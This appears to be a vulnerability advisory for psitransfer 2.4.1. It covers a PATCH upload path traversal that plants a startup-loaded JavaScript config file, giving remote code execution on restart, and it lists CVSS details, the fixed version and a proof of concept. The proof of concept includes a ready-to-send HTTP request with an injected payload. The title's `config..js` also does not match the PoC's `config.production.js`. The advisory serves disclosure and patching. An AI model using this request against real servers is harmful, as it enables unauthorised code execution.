# Vulnerability Summary: Upload PATCH Path Traversal Can Create `config..js` and Lead to Code Execution on Restart

## Overview

In version 2.4.1 of `psitransfer`, the upload middleware has a path traversal vulnerability when processing `PATCH` requests. An attacker can craft a malicious request that abuses logic flaws in the `path.resolve` and `path.normalize` handling to create a `config..js` file in the application root directory. Because Node.js automatically loads and executes this file when the application restarts, the flaw results in remote code execution (RCE).

## Impact Scope

- **Affected Version**: 2.4.1
- **Fixed Version**: 2.4.3
- **CVSS Score**: 7.5 / 10 (High)
- **Attack Vector**: Network
- **Attack Complexity**: High
- **Privileges Required**: None
- **User Interaction**: Required
- **Scope**: Unchanged
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High

## Remediation

Upgrade to version **2.4.3**.

## POC Code

1. Start PsiTransfer 2.4.1 from source with `NODE_ENV=production` and a supported custom upload directory whose basename prefixes a startup-loaded file path, for example `PSITRANSFER_UPLOAD_DIR=/tmp/psitransfer/conf`.
2. Send a `PATCH` request directly to the upload endpoint:

   ```http
   PATCH /files/.%2Fconfig.production.js HTTP/1.1
   Host: target
   User-Agent: 1.0.0
   Upload-Offset: 0
   Content-Type: application/octet-stream

   module.exports = {}; require('fs').writeFileSync('/tmp/psitransfer-rce-proof', 'owned');
   ```

3. Observe that the response is `404 Not Found`, but `/tmp/psitransfer/config.production.js` is created and contains the attacker-controlled payload.
4. Restart the PsiTransfer process, or wait for the next routine restart under the same `NODE_ENV`.
5. Observe that `/tmp/psitransfer-rce-proof` is created during startup, confirming server-side JavaScript execution from the injected `config.production.js`.